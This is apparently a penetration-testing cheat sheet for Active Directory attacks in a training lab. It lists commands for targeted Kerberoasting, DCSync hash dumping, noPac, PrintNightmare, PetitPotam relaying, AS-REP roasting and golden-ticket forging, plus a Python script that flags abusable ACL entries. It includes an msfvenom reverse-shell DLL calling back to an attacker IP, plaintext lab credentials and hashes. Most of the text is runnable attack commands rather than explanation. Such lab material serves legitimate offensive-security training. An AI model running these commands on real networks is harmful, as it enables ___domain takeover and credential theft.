Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
    PowerView function that sets a fake Service Principal Name on a specific user (adunn), so that a TGS ticket for that account can be requested and cracked (targeted Kerberoasting).

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose
    PowerView function that removes the fake Service Principal Name created during the attack.

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose
    PowerView function that removes a specific user (damundsen) from a specific security group (Help Desk Level 1), undoing the membership change made above.

ConvertFrom-SddlString
    PowerShell cmdlet that converts an SDDL string into a readable format.

DCSync

Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl
    PowerView function that views the group membership, SID and UAC flags of a specific user (adunn) in the target Windows ___domain. Performed from a Windows-based host.

$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
    Stores a user's SID in $sid, then uses the PowerView function Get-ObjectAcl on the ___domain head to check whether that user holds the replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that make DCSync possible. Performed from a Windows-based host.

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/[email protected] -use-vss
    Impacket tool that extracts the NTLM hashes (and Kerberos keys) of every ___domain account from the NTDS.dit on the target Domain Controller (172.16.5.5) and saves them to files prefixed inlanefreight_hashes. -just-dc limits the dump to NTDS data; -use-vss copies NTDS.dit through a Volume Shadow Copy instead of pulling the data over DRSUAPI replication. Performed from a Linux-based host.

mimikatz # lsadump::dcsync /___domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
    Uses Mimikatz to perform a DCSync attack: it impersonates a Domain Controller and asks the DC to replicate the credential material of the administrator account. Performed from a Windows-based host.
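The PowerView pipelines in the ACL section and the Get-ObjectAcl check above both reduce to one question: which ACEs in an object's security descriptor name this principal as trustee, and which of those rights are abusable. The following is an added example, not code from the HTB module or PowerView: it answers that question offline on SDDL strings such as ConvertFrom-SddlString consumes, flagging GenericAll, WriteDacl, WriteOwner, ForceChangePassword, the member-attribute write that allows adding group members, and the two replication rights that together permit DCSync. adunn's SID and the User-Force-Change-Password GUID are from the cheat sheet; the other GUIDs are the well-known AD extended-right and attribute GUIDs, and the descriptors and the wley/damundsen RIDs are constructed for the example.

```python
"""Flag the abusable ACEs one principal holds in an AD object's security descriptor,
the question the Get-DomainObjectACL / Get-ObjectAcl pipelines answer on a live ___domain.
Added example, not HTB module code; the SDDL strings below are constructed."""
import re

FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"    # User-Force-Change-Password
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
MEMBER_ATTRIBUTE = "bf9679c0-0de6-11d0-a285-00aa003049e2"         # member attribute of a group

EXTENDED_RIGHT_NAMES = {"": "AllExtendedRights", FORCE_CHANGE_PASSWORD: "ForceChangePassword",
                        DS_REPL_GET_CHANGES: "GetChanges", DS_REPL_GET_CHANGES_ALL: "GetChangesAll"}
WRITE_PROPERTY_NAMES = {"": "WriteAllProperties", MEMBER_ATTRIBUTE: "AddMember"}
# Some tools emit a hex access mask instead of the two-letter SDDL right codes.
MASK_BITS = {"GA": 0x10000000, "GW": 0x40000000, "WD": 0x40000, "WO": 0x80000, "CR": 0x100, "WP": 0x20}


def parse_dacl(sddl):
    """Yield (ace_type, rights, object_guid, trustee_sid) for every ACE in the DACL."""
    m = re.search(r"D:(.*?)(?:S:|$)", sddl)
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = ace.split(";")
        yield ace_type, rights, obj_guid.lower(), trustee.upper()


def rights_set(rights):
    if rights.startswith("0x"):
        mask = int(rights, 16)
        return {code for code, bit in MASK_BITS.items() if mask & bit}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def abusable_rights(sddl, sid):
    """Rights `sid` holds on the object that give a known abuse primitive, sorted."""
    found = set()
    for ace_type, rights, guid, trustee in parse_dacl(sddl):
        if trustee != sid.upper() or ace_type not in ("A", "OA"):
            continue  # deny ACEs and other trustees are not attack paths here
        r = rights_set(rights)
        for code, name in (("GA", "GenericAll"), ("GW", "GenericWrite"), ("WD", "WriteDacl"), ("WO", "WriteOwner")):
            if code in r:
                found.add(name)
        if "CR" in r:
            found.add(EXTENDED_RIGHT_NAMES.get(guid, f"ExtendedRight:{guid}"))
        if "WP" in r:
            found.add(WRITE_PROPERTY_NAMES.get(guid, f"WriteProperty:{guid}"))
    return sorted(found)


def can_dcsync(domain_head_sddl, sid):
    """DCSync needs both replication rights on the ___domain head, or a right that implies them."""
    r = set(abusable_rights(domain_head_sddl, sid))
    return {"GetChanges", "GetChangesAll"} <= r or "GenericAll" in r or "AllExtendedRights" in r


# Constructed descriptors. adunn's SID is the one from the DCSync section; the wley and
# damundsen RIDs are made up for the example.
ADUNN_SID = "S-1-5-21-3842939050-3880317879-2865463114-1164"
WLEY_SID = "S-1-5-21-3842939050-3880317879-2865463114-1181"
DAMUNDSEN_SID = "S-1-5-21-3842939050-3880317879-2865463114-1176"
DOMAIN_HEAD_SDDL = ("O:DAG:DAD:PAI(A;;GA;;;S-1-5-21-3842939050-3880317879-2865463114-512)"
                    f"(OA;;CR;{DS_REPL_GET_CHANGES};;{ADUNN_SID})"
                    f"(OA;;CR;{DS_REPL_GET_CHANGES_ALL};;{ADUNN_SID})"
                    f"(D;;WD;;;{ADUNN_SID})"
                    "(A;;RPLC;;;S-1-5-11)")
DAMUNDSEN_USER_SDDL = f"O:DAG:DAD:(OA;;CR;{FORCE_CHANGE_PASSWORD};;{WLEY_SID})(A;;RPLC;;;S-1-5-11)"
HELP_DESK_GROUP_SDDL = f"O:DAG:DAD:(OA;;WP;{MEMBER_ATTRIBUTE};;{DAMUNDSEN_SID})(A;;RPLC;;;S-1-5-11)"
```

The three constructed descriptors reproduce the chain the ACL and DCSync sections walk through: wley can reset damundsen's password, damundsen can add members to Help Desk Level 1, and adunn holds both replication rights on the ___domain head. Deny ACEs are skipped deliberately; a real evaluation would have to apply them before allows, which is why a flagged right is a lead to confirm with the live pipelines, not a guarantee.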

Privileged Access

Command: Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
Description: PowerView tool used to enumerate the Remote Desktop Users group on a Windows target (-ComputerName ACADEMY-EA-MS01) from a Windows-based host.

Command: Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
Description: PowerView tool used to enumerate the Remote Management Users group on a Windows target (-ComputerName ACADEMY-EA-MS01) from a Windows-based host.

Command: $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
Description: Creates a variable ($password) set equal to the password (Klmcargo2) of a user from a Windows-based host.

Command: $cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
Description: Creates a variable ($cred) set equal to the username (forend) and password ($password) of a target ___domain account from a Windows-based host.

Command: Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred
Description: Uses the PowerShell cmdlet Enter-PSSession to establish a PowerShell session with a target over the network (-ComputerName ACADEMY-EA-DB01) from a Windows-based host. Authenticates using the credentials made in the two commands shown prior ($cred and $password).

Command: evil-winrm -i 10.129.201.234 -u forend
Description: Used to establish a PowerShell session with a Windows target from a Linux-based host using WinRM.

Command: Import-Module .\PowerUpSQL.ps1
Description: Used to import the PowerUpSQL tool.

Command: Get-SQLInstanceDomain
Description: PowerUpSQL tool used to enumerate SQL Server instances from a Windows-based host.

Command: Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
Description: PowerUpSQL tool used to connect to a SQL Server and query its version (-query 'Select @@version') from a Windows-based host.

Command: mssqlclient.py
Description: Impacket tool used to display the functionality and options provided with mssqlclient.py from a Linux-based host.

Command: mssqlclient.py INLANEFREIGHT/[email protected] -windows-auth
Description: Impacket tool used to connect to an MSSQL server from a Linux-based host.

Command: SQL> help
Description: Used to display mssqlclient.py options once connected to an MSSQL server.

Command: SQL> enable_xp_cmdshell
Description: Used to enable the xp_cmdshell stored procedure, which allows executing OS commands via the database, from a Linux-based host.

Command: xp_cmdshell whoami /priv
Description: Used to enumerate rights on a system using xp_cmdshell.

NoPac

Command: sudo git clone https://github.com/Ridter/noPac.git
Description: Used to clone a noPac exploit using git. Performed from a Linux-based host.

Command: sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
Description: Runs scanner.py to check if a target system is vulnerable to noPac/Sam_The_Admin from a Linux-based host.

Command: sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
Description: Used to exploit the noPac/Sam_The_Admin vulnerability and gain a SYSTEM shell (-shell). Performed from a Linux-based host.

Command: sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator
Description: Used to exploit the noPac/Sam_The_Admin vulnerability and perform a DCSync attack against the built-in Administrator account on a Domain Controller from a Linux-based host.

PrintNightmare

Command: git clone https://github.com/cube0x0/CVE-2021-1675.git
Description: Used to clone a PrintNightmare exploit using git from a Linux-based host.

Command: pip3 uninstall impacket
         git clone https://github.com/cube0x0/impacket
         cd impacket
         python3 ./setup.py install
Description: Used to ensure the exploit author's (cube0x0) version of Impacket is installed. This also uninstalls any previous Impacket version on a Linux-based host.

Command: rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
Description: Used to check if a Windows target has MS-PAR and MS-RPRN exposed from a Linux-based host.

Command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll
Description: Used to generate a DLL payload to be used by the exploit to gain a shell session. Performed from a Windows-based host.

Command: sudo smbserver.py -smb2support CompData /path/to/backupscript.dll
Description: Used to create an SMB server and host a shared folder (CompData) at the specified ___location on the local Linux host. This can be used to host the DLL payload that the exploit will attempt to download to the host. Performed from a Linux-based host.

Command: sudo python3 CVE-2021-1675.py inlanefreight.local/<username>:<password>@172.16.5.5 '\\10.129.202.111\CompData\backupscript.dll'
Description: Executes the exploit and specifies the ___location of the DLL payload. Performed from a Linux-based host.

PetitPotam

Command: sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
Description: Impacket tool used to create an NTLM relay by specifying the web enrollment URL of the Certificate Authority host. Performed from a Linux-based host.

Command: git clone https://github.com/topotam/PetitPotam.git
Description: Used to clone the PetitPotam exploit using git. Performed from a Linux-based host.

Command: python3 PetitPotam.py 172.16.5.225 172.16.5.5
Description: Used to execute the PetitPotam exploit by specifying the IP address of the attack host (172.16.5.225) and the target Domain Controller (172.16.5.5). Performed from a Linux-based host.

Command: python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <base64 certificate> dc01.ccache
Description: Uses gettgtpkinit.py to request a TGT for the Domain Controller machine account and save it to a ccache file (dc01.ccache) from a Linux-based host.

Command: secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Description: Impacket tool used to perform a DCSync attack and retrieve one or all of the NTLM password hashes from the target Windows ___domain. Performed from a Linux-based host.

Command: klist
Description: krb5-user command used to view the contents of the ccache file. Performed from a Linux-based host.

Command: python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$
Description: Used to submit TGS requests using getnthash.py from a Linux-based host.

Command: secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba
Description: Impacket tool used to extract hashes from NTDS.dit using a DCSync attack and a captured hash (-hashes). Performed from a Linux-based host.

Command: .\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:<base64 certificate> /ptt
Description: Uses Rubeus to request a TGT and perform a pass-the-ticket attack using the machine account (/user:ACADEMY-EA-DC01$) of a Windows target. Performed from a Windows-based host.

Command: mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt
Description: Performs a DCSync attack using Mimikatz. Performed from a Windows-based host.

Miscellaneous Misconfigurations

Command: Import-Module .\SecurityAssessment.ps1
Description: Used to import the module SecurityAssessment.ps1. Performed from a Windows-based host.

Command: Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Description: SecurityAssessment.ps1 based tool used to enumerate a Windows target for the MS-PRN Printer Bug. Performed from a Windows-based host.

Command: adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
Description: Used to resolve all records in a DNS zone over LDAP from a Linux-based host.

Command: adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r
Description: Used to resolve unknown records in a DNS zone by performing an A query (-r) from a Linux-based host.

Command: Get-DomainUser * | Select-Object samaccountname,description
Description: PowerView tool used to display the description field of select objects (Select-Object) on a target Windows ___domain from a Windows-based host.

Command: Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
Description: PowerView tool used to check for the PASSWD_NOTREQD setting on select objects (Select-Object) in a target Windows ___domain from a Windows-based host.

Command: ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
Description: Used to list the contents of a share hosted on a Windows target from the context of the currently logged-on user. Performed from a Windows-based host.

Group Policy Enumeration & Attacks

Command: gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
Description: Tool used to decrypt a captured Group Policy Preferences password from a Linux-based host.

Command: crackmapexec smb -L | grep gpp
Description: Locates and retrieves a Group Policy Preferences password using CrackMapExec, then filters the output using grep. Performed from a Linux-based host.

Command: crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
Description: Locates and retrieves any credentials stored in the SYSVOL share of a Windows target using CrackMapExec from a Linux-based host.

Command: Get-DomainGPO | select displayname
Description: PowerView tool used to enumerate GPO names in a target Windows ___domain from a Windows-based host.

Command: Get-GPO -All | Select DisplayName
Description: PowerShell cmdlet used to enumerate GPO names. Performed from a Windows-based host.

Command: $sid=Convert-NameToSid "Domain Users"
Description: Creates a variable called $sid that is set equal to the output of the Convert-NameToSid tool for the group account Domain Users. Performed from a Windows-based host.

Command: Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}
Description: PowerView tool used to check if the Domain Users group (-eq $sid) has any rights over one or more GPOs. Performed from a Windows-based host.

Command: Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532
Description: PowerShell cmdlet used to display the name of a GPO given its GUID. Performed from a Windows-based host.

ASREPRoasting

Command: Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Description: PowerView tool used to search for the DONT_REQ_PREAUTH value across user accounts in a target Windows ___domain. Performed from a Windows-based host.

Command: .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
Description: Uses Rubeus to perform an AS-REP Roasting attack and formats the output for Hashcat. Performed from a Windows-based host.

Command: hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
Description: Uses Hashcat to attempt to crack the captured hash using a wordlist (rockyou.txt). Performed from a Linux-based host.

Command: kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
Description: Enumerates users in a target Windows ___domain and automatically retrieves the AS-REP for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host.

Trust Relationships - Child > Parent Trusts

Command: Import-Module activedirectory
Description: Used to import the Active Directory module. Performed from a Windows-based host.

Command: Get-ADTrust -Filter *
Description: PowerShell cmdlet used to enumerate a target Windows ___domain's trust relationships. Performed from a Windows-based host.

Command: Get-DomainTrust
Description: PowerView tool used to enumerate a target Windows ___domain's trust relationships. Performed from a Windows-based host.

Command: Get-DomainTrustMapping
Description: PowerView tool used to perform a ___domain trust mapping from a Windows-based host.

Command: Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
Description: PowerView tool used to enumerate users in a target child ___domain from a Windows-based host.

Command: mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
Description: Uses Mimikatz to obtain the KRBTGT account's NT hash from a Windows-based host.

Command: Get-DomainSID
Description: PowerView tool used to get the SID of a target child ___domain from a Windows-based host.

Command: Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
Description: PowerView tool used to obtain the Enterprise Admins group's SID from a Windows-based host.

Command: ls \\academy-ea-dc01.inlanefreight.local\c$
Description: Used to attempt to list the contents of the C drive on a target Domain Controller. Performed from a Windows-based host.

Command: mimikatz # kerberos::golden /user:hacker /___domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
Description: Uses Mimikatz to create a Golden Ticket from a Windows-based host.

Command: .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /___domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
Description: Uses Rubeus to create a Golden Ticket from a Windows-based host.

Command: mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm
Description: Uses Mimikatz to perform a DCSync attack from a Windows-based host.

Command: secretsdump.py logistics.inlanefreight.local/htb-[email protected] -just-dc-user LOGISTICS/krbtgt
Description: Impacket tool used to perform a DCSync attack from a Linux-based host.

Command: lookupsid.py logistics.inlanefreight.local/htb-[email protected]
Description: Impacket tool used to perform a SID brute-forcing attack from a Linux-based host.

Command: lookupsid.py logistics.inlanefreight.local/htb-[email protected] | grep "Domain SID"
Description: Impacket tool used to retrieve the SID of a target Windows ___domain from a Linux-based host.

Command: lookupsid.py logistics.inlanefreight.local/htb-[email protected] | grep -B12 "Enterprise Admins"
Description: Impacket tool used to retrieve the SID of a target Windows ___domain and attach it to the Enterprise Admins group's RID from a Linux-based host.

Command: ticketer.py -nthash 9d765b482771505cbe97411065964d5f -___domain LOGISTICS.INLANEFREIGHT.LOCAL -___domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
Description: Impacket tool used to create a Golden Ticket from a Linux-based host.

Command: export KRB5CCNAME=hacker.ccache
Description: Used to set the KRB5CCNAME environment variable from a Linux-based host.

Command: psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
Description: Impacket tool used to establish a shell session with a target Domain Controller from a Linux-based host.

Command: raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
Description: Impacket tool that automatically performs an attack that escalates from a child ___domain to its parent ___domain.

Trust Relationships - Cross-Forest

Command: Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
Description: PowerView tool used to enumerate accounts with associated SPNs from a Windows-based host.

Command: Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof
Description: PowerView tool used to enumerate the mssqlsvc account from a Windows-based host.

Command: .\Rubeus.exe kerberoast /___domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
Description: Uses Rubeus to perform a Kerberoasting attack against a target Windows ___domain (/___domain:FREIGHTLOGISTICS.LOCAL) from a Windows-based host.

Command: Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
Description: PowerView tool used to enumerate groups with users that do not belong to the ___domain from a Windows-based host.

Command: Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
Description: PowerShell cmdlet used to remotely connect to a target Windows system from a Windows-based host.

Command: GetUserSPNs.py -request -target-___domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Description: Impacket tool used to request (-request) the TGS ticket of an account in a target Windows ___domain (-target-___domain) from a Linux-based host.

Command: bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2
Description: Runs the Python implementation of BloodHound against a target Windows ___domain from a Linux-based host.

Command: zip -r ilfreight_bh.zip *.json
Description: Used to compress multiple files into a single .zip file to be uploaded into the BloodHound GUI.